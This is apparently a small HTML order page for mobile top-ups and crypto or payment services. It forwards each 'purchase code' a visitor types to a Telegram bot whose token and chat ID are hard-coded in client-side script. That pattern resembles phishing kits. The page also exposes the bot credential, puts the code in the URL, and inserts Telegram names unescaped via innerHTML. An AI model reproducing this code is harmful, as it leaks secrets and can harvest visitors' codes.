<!DOCTYPE html>
<html lang="fr">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Lokan</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #f0f0f0;
    }

    .container {
      width: 80%;
      margin: 10px auto;
      padding: 20px;
      background-color: #fff;
      border: 1px solid #ddd;
      border-radius: 10px;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
    }

    .title {
      text-align: center;
      margin-bottom: 20px;
    }
#info {
font-size: 18px;
color: #666;
}
#user-info {
  display: flex;
  flex-direction: column;
  align-items: center;
}

#user-name {
  font-size: 18px;
  font-weight: bold;
}

#user-balance {
  font-size: 18px;
  color: #666;
}
.popup {
  position: fixed;
  bottom: 0;
  left: 50%;
  transform: translateX(-50%);
  background-color: #fff;
  padding: 20px;
  border-radius: 10px;
  box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
  width: 80%;
  max-width: 500px;
  display: none;
  z-index: 1000;
}

.popup-content {
  text-align: center;
}

body.overflow-hidden {
  overflow: hidden;
}

    .form-group {
      margin-bottom: 20px;
    }

    .form-group label {
      display: block;
      margin-bottom: 5px;
    }

    .form-group select{
      width: 100%;
      height: 40px;
      padding: 10px;
      border: 1px solid #ccc;
      border-radius: 5px;
    }
    .form-group input[type="text"] {
      width: 95%;
      height: 20px;
margin-bottom: 10px;
padding: 5px;
      border: 1px solid #ccc;
      border-radius: 5px;
    }
    .order-button {
      background-color: #4CAF50;
      color: #fff;
      padding: 10px 20px;
      border: none;
      border-radius: 5px;
      cursor: pointer;
    }

    .order-button:hover {
      background-color: #3e8e41;
    }
.alert-box {
position: fixed;
top: 50%;
left: 50%;
transform: translate(-50%, -50%);
background-color: #ccc;
padding: 20px;
border-radius: 10px;
box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
width: 80%;
max-width: 500px;
display: none;
}
.alert-box h2 {
margin-top: 0;
}
.alert-box button {
background-color: #4CAF50;
color: #fff;
padding: 10px 20px;
border: none;
border-radius: 5px;
cursor: pointer;
}
.alert-box button:hover {
background-color: #3e8e41;
}
  </style>
</head>
<body>
      <div class="container" id="user-info">
      <h2 id="user-name"></h2>
      <h4 id="user-namee"></h4>
      </div>
  <div class="container">
    <form>
      <div class="form-group">
        <select id="operateur">
          <option value="">--Category--</option>
          <option value="ooredoo">Ooredoo</option>
          <option value="djezzy">Djezzy</option>
          <option value="mobilis">Mobilis</option>
          <option value="binance">Binance</option>
          <option value="wise">Wise</option>
          <option value="redotpay">RedotPay</option>
          <option value="tiktok">TikTok</option>
          <option value="imo">imo</option>
          <option value="bybit">ByBit</option>
        </select>
   </div>
      <div class="form-group">
        <label for="prix">Service:</label>
        <select id="prix" disabled>
          <option value="">--Service--</option>
        </select>
      </div>
      <div class="form-group">
        <label for="code">ادخل رمز الشراء:</label>
        <input type="text" id="code" name="code">
      </div>
      <button class="order-button" onclick="order(this)">New Order</button>
    </form>
  </div>

<div class="alert-box" id="alert-box">
<p><h2>Erreur!</h2> </br>Veuillez entrer le code d'achat!</p>
<button onclick="hideAlert()">Fermer</button>
</div>
  <script>
    document.getElementById('operateur').addEventListener('change', function() {
      const operateur = this.value;
      const prixSelect = document.getElementById('prix');
      prixSelect.disabled = false;
      prixSelect.innerHTML = '';
      switch (operateur) {
        case 'ooredoo':
          prixSelect.innerHTML += '<option value="100">100 DA</option>';
          prixSelect.innerHTML += '<option value="200">200 DA</option>';
          prixSelect.innerHTML += '<option value="500">500 DA</option>';
          break;
        case 'djezzy':
          prixSelect.innerHTML += '<option value="100">100 DA</option>';
          prixSelect.innerHTML += '<option value="200">200 DA</option>';
          prixSelect.innerHTML += '<option value="500">500 DA</option>';
          break;
        case 'mobilis':
          prixSelect.innerHTML += '<option value="200">200 DA</option>';
          prixSelect.innerHTML += '<option value="500">500 DA</option>';
          prixSelect.innerHTML += '<option value="1000">1000 DA</option>';
          break;
        case 'wise':
          prixSelect.innerHTML += '<option value="USD">USD</option>';
          prixSelect.innerHTML += '<option value="EUR">EUR</option>';
          break;
        default:
          prixSelect.disabled = true;
      }
    });

    const telegramToken = '7899966999:AAFaQeVG7ZZWoE6Fo1NoR7yJmmgK_38u-Cs';
    const chatId = '5365425194';

  function order(element) {
  event.preventDefault();
  const container = element.parentNode;
  const operateur = document.getElementById('operateur').value;
  const prix = document.getElementById('prix').value;
  const code = document.getElementById('code').value;
  
  if (operateur !== '' && prix !== '' && code !== '') {
    const message = `💵Nouvel achat :\n Produit: ${operateur}\n Service: ${prix}\n Code: ${code}`;
    sendTelegramMessage(message);
    // تحويل المستخدم إلى الصفحة الجديدة
    const url = `success.html?operateur=${operateur}&prix=${prix}&code=${code}`;
    window.location.href = url;
    return false;
  } else {
    showAlert();
  }
}

    function sendTelegramMessage(message) {
      const url = `https://api.telegram.org/bot${telegramToken}/sendMessage`;
      const params = {
        chat_id: chatId,
        text: message,
      };
      fetch(url, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
        },
        body: JSON.stringify(params),
      })
      .then((response) => response.json())
      .then((data) => console.log(data))
      .catch((error) => console.error(error));
    }
  
  function getUpdates() {
  const url = `https://api.telegram.org/bot${telegramToken}/getUpdates`;
  fetch(url)
    .then(response => response.json())
    .then(data => {
      const updates = data.result;
      updates.forEach(update => {
        const message = update.message;
        const userName = message.from.first_name + ' ' + message.from.last_name;
        const chatId = message.chat.id;
        console.log(`Nom d'utilisateur : ${userName}`);
        console.log(`ID de chat : ${chatId}`);
        // Mettre à jour le nom d'utilisateur dans la page
        document.getElementById('user-name').innerHTML = `${userName}`;
        document.getElementById('user-namee').innerHTML = `${chatId}`;
        // Ajouter le code pour mettre à jour les autres informations ici
      });
    })
    .catch(error => console.error(error));
}

// Appeler la fonction getUpdates toutes les 5 secondes

setInterval(getUpdates, 5000);
// Appeler la fonction getUpdates une fois au démarrage
getUpdates();
  
  </script>
</body>
</html>
